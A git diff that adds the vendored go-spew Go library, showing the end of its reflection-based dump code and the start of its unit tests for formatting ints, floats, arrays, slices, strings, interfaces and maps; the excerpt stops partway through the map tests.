+ printUint(d.w, v.Uint(), 10)
+
+ case reflect.Float32:
+ printFloat(d.w, v.Float(), 32)
+
+ case reflect.Float64:
+ printFloat(d.w, v.Float(), 64)
+
+ case reflect.Complex64:
+ printComplex(d.w, v.Complex(), 32)
+
+ case reflect.Complex128:
+ printComplex(d.w, v.Complex(), 64)
+
+ case reflect.Slice:
+ if v.IsNil() {
+ d.w.Write(nilAngleBytes)
+ break
+ }
+ fallthrough
+
+ case reflect.Array:
+ d.w.Write(openBraceNewlineBytes)
+ d.depth++
+ if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) {
+ d.indent()
+ d.w.Write(maxNewlineBytes)
+ } else {
+ d.dumpSlice(v)
+ }
+ d.depth--
+ d.indent()
+ d.w.Write(closeBraceBytes)
+
+ case reflect.String:
+ d.w.Write([]byte(strconv.Quote(v.String())))
+
+ case reflect.Interface:
+ // The only time we should get here is for nil interfaces due to
+ // unpackValue calls.
+ if v.IsNil() {
+ d.w.Write(nilAngleBytes)
+ }
+
+ case reflect.Ptr:
+ // Do nothing. We should never get here since pointers have already
+ // been handled above.
+
+ case reflect.Map:
+ // Nil maps should be indicated as different from empty maps.
+ if v.IsNil() {
+ d.w.Write(nilAngleBytes)
+ break
+ }
+
+ d.w.Write(openBraceNewlineBytes)
+ d.depth++
+ if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) {
+ d.indent()
+ d.w.Write(maxNewlineBytes)
+ } else {
+ numEntries := v.Len()
+ keys := v.MapKeys()
+ if d.cs.SortKeys {
+ sortValues(keys, d.cs)
+ }
+ for i, key := range keys {
+ d.dump(d.unpackValue(key))
+ d.w.Write(colonSpaceBytes)
+ d.ignoreNextIndent = true
+ d.dump(d.unpackValue(v.MapIndex(key)))
+ if i < (numEntries - 1) {
+ d.w.Write(commaNewlineBytes)
+ } else {
+ d.w.Write(newlineBytes)
+ }
+ }
+ }
+ d.depth--
+ d.indent()
+ d.w.Write(closeBraceBytes)
+
+ case reflect.Struct:
+ d.w.Write(openBraceNewlineBytes)
+ d.depth++
+ if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) {
+ d.indent()
+ d.w.Write(maxNewlineBytes)
+ } else {
+ vt := v.Type()
+ numFields := v.NumField()
+ for i := 0; i < numFields; i++ {
+ d.indent()
+ vtf := vt.Field(i)
+ d.w.Write([]byte(vtf.Name))
+ d.w.Write(colonSpaceBytes)
+ d.ignoreNextIndent = true
+ d.dump(d.unpackValue(v.Field(i)))
+ if i < (numFields - 1) {
+ d.w.Write(commaNewlineBytes)
+ } else {
+ d.w.Write(newlineBytes)
+ }
+ }
+ }
+ d.depth--
+ d.indent()
+ d.w.Write(closeBraceBytes)
+
+ case reflect.Uintptr:
+ printHexPtr(d.w, uintptr(v.Uint()))
+
+ case reflect.UnsafePointer, reflect.Chan, reflect.Func:
+ printHexPtr(d.w, v.Pointer())
+
+ // There were not any other types at the time this code was written, but
+ // fall back to letting the default fmt package handle it in case any new
+ // types are added.
+ default:
+ if v.CanInterface() {
+ fmt.Fprintf(d.w, "%v", v.Interface())
+ } else {
+ fmt.Fprintf(d.w, "%v", v.String())
+ }
+ }
+}
+
+// fdump is a helper function to consolidate the logic from the various public
+// methods which take varying writers and config states.
+func fdump(cs *ConfigState, w io.Writer, a ...interface{}) {
+ for _, arg := range a {
+ if arg == nil {
+ w.Write(interfaceBytes)
+ w.Write(spaceBytes)
+ w.Write(nilAngleBytes)
+ w.Write(newlineBytes)
+ continue
+ }
+
+ d := dumpState{w: w, cs: cs}
+ d.pointers = make(map[uintptr]int)
+ d.dump(reflect.ValueOf(arg))
+ d.w.Write(newlineBytes)
+ }
+}
+
+// Fdump formats and displays the passed arguments to io.Writer w. It formats
+// exactly the same as Dump.
+func Fdump(w io.Writer, a ...interface{}) {
+ fdump(&Config, w, a...)
+}
+
+// Sdump returns a string with the passed arguments formatted exactly the same
+// as Dump.
+func Sdump(a ...interface{}) string {
+ var buf bytes.Buffer
+ fdump(&Config, &buf, a...)
+ return buf.String()
+}
+
+/*
+Dump displays the passed parameters to standard out with newlines, customizable
+indentation, and additional debug information such as complete types and all
+pointer addresses used to indirect to the final value. It provides the
+following features over the built-in printing facilities provided by the fmt
+package:
+
+ * Pointers are dereferenced and followed
+ * Circular data structures are detected and handled properly
+ * Custom Stringer/error interfaces are optionally invoked, including
+ on unexported types
+ * Custom types which only implement the Stringer/error interfaces via
+ a pointer receiver are optionally invoked when passing non-pointer
+ variables
+ * Byte arrays and slices are dumped like the hexdump -C command which
+ includes offsets, byte values in hex, and ASCII output
+
+The configuration options are controlled by an exported package global,
+spew.Config. See ConfigState for options documentation.
+
+See Fdump if you would prefer dumping to an arbitrary io.Writer or Sdump to
+get the formatted result as a string.
+*/
+func Dump(a ...interface{}) {
+ fdump(&Config, os.Stdout, a...)
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/dump_test.go b/vendor/github.com/davecgh/go-spew/spew/dump_test.go
new file mode 100644
index 0000000000..5aad9c7af0
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dump_test.go
@@ -0,0 +1,1042 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+Test Summary:
+NOTE: For each test, a nil pointer, a single pointer and double pointer to the
+base test element are also tested to ensure proper indirection across all types.
+
+- Max int8, int16, int32, int64, int
+- Max uint8, uint16, uint32, uint64, uint
+- Boolean true and false
+- Standard complex64 and complex128
+- Array containing standard ints
+- Array containing type with custom formatter on pointer receiver only
+- Array containing interfaces
+- Array containing bytes
+- Slice containing standard float32 values
+- Slice containing type with custom formatter on pointer receiver only
+- Slice containing interfaces
+- Slice containing bytes
+- Nil slice
+- Standard string
+- Nil interface
+- Sub-interface
+- Map with string keys and int vals
+- Map with custom formatter type on pointer receiver only keys and vals
+- Map with interface keys and values
+- Map with nil interface value
+- Struct with primitives
+- Struct that contains another struct
+- Struct that contains custom type with Stringer pointer interface via both
+ exported and unexported fields
+- Struct that contains embedded struct and field to same struct
+- Uintptr to 0 (null pointer)
+- Uintptr address of real variable
+- Unsafe.Pointer to 0 (null pointer)
+- Unsafe.Pointer to address of real variable
+- Nil channel
+- Standard int channel
+- Function with no params and no returns
+- Function with param and no returns
+- Function with multiple params and multiple returns
+- Struct that is circular through self referencing
+- Structs that are circular through cross referencing
+- Structs that are indirectly circular
+- Type that panics in its Stringer interface
+*/
+
+package spew_test
+
+import (
+ "bytes"
+ "fmt"
+ "testing"
+ "unsafe"
+
+ "github.com/davecgh/go-spew/spew"
+)
+
+// dumpTest is used to describe a test to be performed against the Dump method.
+type dumpTest struct {
+ in interface{}
+ wants []string
+}
+
+// dumpTests houses all of the tests to be performed against the Dump method.
+var dumpTests = make([]dumpTest, 0)
+
+// addDumpTest is a helper function to append the passed input and desired
+// result to dumpTests.
+func addDumpTest(in interface{}, wants ...string) {
+ test := dumpTest{in, wants}
+ dumpTests = append(dumpTests, test)
+}
+
+func addIntDumpTests() {
+ // Max int8.
+ v := int8(127)
+ nv := (*int8)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "int8"
+ vs := "127"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Max int16.
+ v2 := int16(32767)
+ nv2 := (*int16)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "int16"
+ v2s := "32767"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+
+ // Max int32.
+ v3 := int32(2147483647)
+ nv3 := (*int32)(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "int32"
+ v3s := "2147483647"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+
+ // Max int64.
+ v4 := int64(9223372036854775807)
+ nv4 := (*int64)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "int64"
+ v4s := "9223372036854775807"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+ addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+ addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+ addDumpTest(nv4, "(*"+v4t+")()\n")
+
+ // Max int.
+ v5 := int(2147483647)
+ nv5 := (*int)(nil)
+ pv5 := &v5
+ v5Addr := fmt.Sprintf("%p", pv5)
+ pv5Addr := fmt.Sprintf("%p", &pv5)
+ v5t := "int"
+ v5s := "2147483647"
+ addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+ addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n")
+ addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n")
+ addDumpTest(nv5, "(*"+v5t+")()\n")
+}
+
+func addUintDumpTests() {
+ // Max uint8.
+ v := uint8(255)
+ nv := (*uint8)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "uint8"
+ vs := "255"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Max uint16.
+ v2 := uint16(65535)
+ nv2 := (*uint16)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "uint16"
+ v2s := "65535"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+
+ // Max uint32.
+ v3 := uint32(4294967295)
+ nv3 := (*uint32)(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "uint32"
+ v3s := "4294967295"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+
+ // Max uint64.
+ v4 := uint64(18446744073709551615)
+ nv4 := (*uint64)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "uint64"
+ v4s := "18446744073709551615"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+ addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+ addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+ addDumpTest(nv4, "(*"+v4t+")()\n")
+
+ // Max uint.
+ v5 := uint(4294967295)
+ nv5 := (*uint)(nil)
+ pv5 := &v5
+ v5Addr := fmt.Sprintf("%p", pv5)
+ pv5Addr := fmt.Sprintf("%p", &pv5)
+ v5t := "uint"
+ v5s := "4294967295"
+ addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+ addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n")
+ addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n")
+ addDumpTest(nv5, "(*"+v5t+")()\n")
+}
+
+func addBoolDumpTests() {
+ // Boolean true.
+ v := bool(true)
+ nv := (*bool)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "bool"
+ vs := "true"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Boolean false.
+ v2 := bool(false)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "bool"
+ v2s := "false"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+}
+
+func addFloatDumpTests() {
+ // Standard float32.
+ v := float32(3.1415)
+ nv := (*float32)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "float32"
+ vs := "3.1415"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Standard float64.
+ v2 := float64(3.1415926)
+ nv2 := (*float64)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "float64"
+ v2s := "3.1415926"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+}
+
+func addComplexDumpTests() {
+ // Standard complex64.
+ v := complex(float32(6), -2)
+ nv := (*complex64)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "complex64"
+ vs := "(6-2i)"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Standard complex128.
+ v2 := complex(float64(-6), 2)
+ nv2 := (*complex128)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "complex128"
+ v2s := "(-6+2i)"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+}
+
+func addArrayDumpTests() {
+ // Array containing standard ints.
+ v := [3]int{1, 2, 3}
+ vLen := fmt.Sprintf("%d", len(v))
+ vCap := fmt.Sprintf("%d", cap(v))
+ nv := (*[3]int)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "int"
+ vs := "(len=" + vLen + " cap=" + vCap + ") {\n (" + vt + ") 1,\n (" +
+ vt + ") 2,\n (" + vt + ") 3\n}"
+ addDumpTest(v, "([3]"+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*[3]"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**[3]"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*[3]"+vt+")()\n")
+
+ // Array containing type with custom formatter on pointer receiver only.
+ v2i0 := pstringer("1")
+ v2i1 := pstringer("2")
+ v2i2 := pstringer("3")
+ v2 := [3]pstringer{v2i0, v2i1, v2i2}
+ v2i0Len := fmt.Sprintf("%d", len(v2i0))
+ v2i1Len := fmt.Sprintf("%d", len(v2i1))
+ v2i2Len := fmt.Sprintf("%d", len(v2i2))
+ v2Len := fmt.Sprintf("%d", len(v2))
+ v2Cap := fmt.Sprintf("%d", cap(v2))
+ nv2 := (*[3]pstringer)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "spew_test.pstringer"
+ v2sp := "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t +
+ ") (len=" + v2i0Len + ") stringer 1,\n (" + v2t +
+ ") (len=" + v2i1Len + ") stringer 2,\n (" + v2t +
+ ") (len=" + v2i2Len + ") " + "stringer 3\n}"
+ v2s := v2sp
+ if spew.UnsafeDisabled {
+ v2s = "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t +
+ ") (len=" + v2i0Len + ") \"1\",\n (" + v2t + ") (len=" +
+ v2i1Len + ") \"2\",\n (" + v2t + ") (len=" + v2i2Len +
+ ") " + "\"3\"\n}"
+ }
+ addDumpTest(v2, "([3]"+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*[3]"+v2t+")("+v2Addr+")("+v2sp+")\n")
+ addDumpTest(&pv2, "(**[3]"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2sp+")\n")
+ addDumpTest(nv2, "(*[3]"+v2t+")()\n")
+
+ // Array containing interfaces.
+ v3i0 := "one"
+ v3 := [3]interface{}{v3i0, int(2), uint(3)}
+ v3i0Len := fmt.Sprintf("%d", len(v3i0))
+ v3Len := fmt.Sprintf("%d", len(v3))
+ v3Cap := fmt.Sprintf("%d", cap(v3))
+ nv3 := (*[3]interface{})(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "[3]interface {}"
+ v3t2 := "string"
+ v3t3 := "int"
+ v3t4 := "uint"
+ v3s := "(len=" + v3Len + " cap=" + v3Cap + ") {\n (" + v3t2 + ") " +
+ "(len=" + v3i0Len + ") \"one\",\n (" + v3t3 + ") 2,\n (" +
+ v3t4 + ") 3\n}"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+
+ // Array containing bytes.
+ v4 := [34]byte{
+ 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18,
+ 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20,
+ 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
+ 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30,
+ 0x31, 0x32,
+ }
+ v4Len := fmt.Sprintf("%d", len(v4))
+ v4Cap := fmt.Sprintf("%d", cap(v4))
+ nv4 := (*[34]byte)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "[34]uint8"
+ v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " +
+ "{\n 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20" +
+ " |............... |\n" +
+ " 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30" +
+ " |!\"#$%&'()*+,-./0|\n" +
+ " 00000020 31 32 " +
+ " |12|\n}"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+ addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+ addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+ addDumpTest(nv4, "(*"+v4t+")()\n")
+}
+
+func addSliceDumpTests() {
+ // Slice containing standard float32 values.
+ v := []float32{3.14, 6.28, 12.56}
+ vLen := fmt.Sprintf("%d", len(v))
+ vCap := fmt.Sprintf("%d", cap(v))
+ nv := (*[]float32)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "float32"
+ vs := "(len=" + vLen + " cap=" + vCap + ") {\n (" + vt + ") 3.14,\n (" +
+ vt + ") 6.28,\n (" + vt + ") 12.56\n}"
+ addDumpTest(v, "([]"+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*[]"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**[]"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*[]"+vt+")()\n")
+
+ // Slice containing type with custom formatter on pointer receiver only.
+ v2i0 := pstringer("1")
+ v2i1 := pstringer("2")
+ v2i2 := pstringer("3")
+ v2 := []pstringer{v2i0, v2i1, v2i2}
+ v2i0Len := fmt.Sprintf("%d", len(v2i0))
+ v2i1Len := fmt.Sprintf("%d", len(v2i1))
+ v2i2Len := fmt.Sprintf("%d", len(v2i2))
+ v2Len := fmt.Sprintf("%d", len(v2))
+ v2Cap := fmt.Sprintf("%d", cap(v2))
+ nv2 := (*[]pstringer)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "spew_test.pstringer"
+ v2s := "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t + ") (len=" +
+ v2i0Len + ") stringer 1,\n (" + v2t + ") (len=" + v2i1Len +
+ ") stringer 2,\n (" + v2t + ") (len=" + v2i2Len + ") " +
+ "stringer 3\n}"
+ addDumpTest(v2, "([]"+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*[]"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**[]"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*[]"+v2t+")()\n")
+
+ // Slice containing interfaces.
+ v3i0 := "one"
+ v3 := []interface{}{v3i0, int(2), uint(3), nil}
+ v3i0Len := fmt.Sprintf("%d", len(v3i0))
+ v3Len := fmt.Sprintf("%d", len(v3))
+ v3Cap := fmt.Sprintf("%d", cap(v3))
+ nv3 := (*[]interface{})(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "[]interface {}"
+ v3t2 := "string"
+ v3t3 := "int"
+ v3t4 := "uint"
+ v3t5 := "interface {}"
+ v3s := "(len=" + v3Len + " cap=" + v3Cap + ") {\n (" + v3t2 + ") " +
+ "(len=" + v3i0Len + ") \"one\",\n (" + v3t3 + ") 2,\n (" +
+ v3t4 + ") 3,\n (" + v3t5 + ") \n}"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+
+ // Slice containing bytes.
+ v4 := []byte{
+ 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18,
+ 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20,
+ 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
+ 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30,
+ 0x31, 0x32,
+ }
+ v4Len := fmt.Sprintf("%d", len(v4))
+ v4Cap := fmt.Sprintf("%d", cap(v4))
+ nv4 := (*[]byte)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "[]uint8"
+ v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " +
+ "{\n 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20" +
+ " |............... |\n" +
+ " 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30" +
+ " |!\"#$%&'()*+,-./0|\n" +
+ " 00000020 31 32 " +
+ " |12|\n}"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+ addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+ addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+ addDumpTest(nv4, "(*"+v4t+")()\n")
+
+ // Nil slice.
+ v5 := []int(nil)
+ nv5 := (*[]int)(nil)
+ pv5 := &v5
+ v5Addr := fmt.Sprintf("%p", pv5)
+ pv5Addr := fmt.Sprintf("%p", &pv5)
+ v5t := "[]int"
+ v5s := ""
+ addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+ addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n")
+ addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n")
+ addDumpTest(nv5, "(*"+v5t+")()\n")
+}
+
+func addStringDumpTests() {
+ // Standard string.
+ v := "test"
+ vLen := fmt.Sprintf("%d", len(v))
+ nv := (*string)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "string"
+ vs := "(len=" + vLen + ") \"test\""
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+}
+
+func addInterfaceDumpTests() {
+ // Nil interface.
+ var v interface{}
+ nv := (*interface{})(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "interface {}"
+ vs := ""
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Sub-interface.
+ v2 := interface{}(uint16(65535))
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "uint16"
+ v2s := "65535"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+}
+
+func addMapDumpTests() {
+ // Map with string keys and int vals.
+ k := "one"
+ kk := "two"
+ m := map[string]int{k: 1, kk: 2}
+ klen := fmt.Sprintf("%d", len(k)) // not kLen to shut golint up
+ kkLen := fmt.Sprintf("%d", len(kk))
+ mLen := fmt.Sprintf("%d", len(m))
+ nilMap := map[string]int(nil)
+ nm := (*map[string]int)(nil)
+ pm := &m
+ mAddr := fmt.Sprintf("%p", pm)
+ pmAddr := fmt.Sprintf("%p", &pm)
+ mt := "map[string]int"
+ mt1 := "string"
+ mt2 := "int"
+ ms := "(len=" + mLen + ") {\n (" + mt1 + ") (len=" + klen + ") " +
+ "\"one\": (" + mt2 + ") 1,\n (" + mt1 + ") (len=" + kkLen +
+ ") \"two\": (" + mt2 + ") 2\n}"
+ ms2 := "(len=" + mLen + ") {\n (" + mt1 + ") (len=" + kkLen + ") " +
